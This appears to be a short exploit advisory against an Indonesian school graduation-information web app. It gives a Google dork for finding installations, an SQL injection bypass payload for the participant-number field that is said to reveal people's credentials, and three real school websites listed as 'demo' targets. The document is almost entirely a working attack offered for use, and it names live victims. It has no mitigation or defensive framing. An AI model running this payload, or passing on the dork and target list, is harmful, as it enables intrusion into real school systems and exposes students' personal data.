+------------------------------------------------+ # Exploit Title: Aplikasi Sistem Informasi Kelulusan - Bypass SQL Vulnerabilities # Google Dork: inurl:/index.html intitle:Admin Tokol DistroIT # Date: 06/09/2020 # Author: Gh05t666nero # Team: Indoghostsec # Tested on: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01) +------------------------------------------------+ [~] Search the dork in Google [~] Open target [~] Enter No Peserta with [~] No Peserta: nero' or'1=1# [~] If vulnerable you will see the credentials of a person or several people at once. +------------------------------------------------+ [~] Demo Site:- [~] http://www.smpkatolikadisucipto.sch.id/kabarlulus/ [~] http://smk1palembang.sch.id/kelulusanxyz-0a/ [~] http://smapgri1mjl.sch.id/kelulusan/ +------------------------------------------------+ Contact me:- cybernatic@indoghostsec.my.id